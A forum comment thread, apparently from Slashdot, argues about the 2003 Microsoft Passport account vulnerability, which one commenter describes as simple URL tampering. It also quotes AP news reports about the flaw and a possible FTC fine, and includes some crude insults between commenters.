You imply your own system architecture understanding and application design skillz are at least competent by attempting to impugn mine. Well, then you should think a little harder, buggar. Just creating an SSL session to keep your info safe on the wire doesn't begin to mitigate the problem with this exploit (um, geez, that's such an official word for what in this case boils down to URL-tampering... I thought enough work went into web app design today that URL-tampering was an extinct attack vector). That was my whole point earlier. Any idiot who can examine the hyperlink can imagine the attack method, So just observing normal operation within the app itself is enough to figure out that this is wider open than your pouting rictus in the proximity of the PFY.

You want code samples? There's nothing I do in any of my code that isn't easily derived from a five-minute google for whatever it is you're trying to do. You want some enlightening secrets about the super-secret world of locking down a server? Sorry, all I have is what's freely available from the usual sources, you know, bugtraq, the NSA, honeynet discussion lists, etc. No magic bullets. You caught me. What a fraud I've perpetrated.

I don't know where you get off trying to paint me as some kind of Steve Gibson or the like, but it sure is funny to watch you fail at cogent sentience in the process. I swear, when you get all worked up, it's like watching de-volution at work. Are we not men? The difference between your motivation and mine for carrying on this converstion is this... You do it just to antagonize me, but I actually believe there is hope for you one day to look at something more open-mindedly than you currently do. You egg me on because you believe my kind will never change. I reply becuase I retain hope that yours one day will. That's the beauty in the Dawn of Man... it happens every day somewhere. And once it happens to you, you can make it happen over and over for others.

It just keeps getting better and better...

[onlyabill]

May 08, Associated Press Microsoft admits Passport was vulnerable. Computer researcher Muhammad Faisal Rauf Danka of Pakistan discovered how to breach Microsoft Corp.'s security procedures for its Internet Passport service. The service is designed to protect customers visiting some retail Web sites, sending e-mails and in some cases making credit-card purchases. Microsoft acknowledged the flaw affected all its 200 million Passport accounts but said it fixed the problem early Thursday, after details were published on the Internet Wednesday night. Under a settlement with the Federal Trade Commission (FTC) last year over lapsed Passport security, Microsoft pledged to take reasonable safeguards to protect personal consumer information during the next two decades or risk fines up to $11,000 per violation. The FTC's Jessica Rich said Thursday that each vulnerable account could constitute a separate violation - raising the maximum fine that could be assessed against Microsoft to $2.2 trillion. Source: http://www.washingtonpost.com/wp-dyn/articles/A303 30-2003May8.html

Re:It just keeps getting better and better...

[geoswan]

2.2 trillion! Sure throw the book at them...

Somebody mod this up...

Also reported in the RISKS digest.

Re:... piss off there little butker :o)

[AlphaSys]

I'm not sure I get your point, fwad. That was exactly the point of my first post, so what's your argument with me, regurgitator? And I never said I "figured out" anything. I said some developers have to be bitch-slapped to stop doing it. Others have to be bitch-slapped for other various reasons, but I'm sure you can cite a list from personal experience far longer than any I can imagine. Four replies to a single post.... must've struck a nerve.

Oh one more thing, to answer your question... I work with...
...
YOUR MOTHER!

Bad Publicity is starting... AP story

[jeffsenter]

The NYTimes is carrying the AP story. It starts "Microsoft acknowledged a security flaw Thursday in its popular Internet Passport service that left 200 million consumer accounts vulnerable to hackers and thieves -- an admission that could expose the company to a hefty fine from U.S. regulators."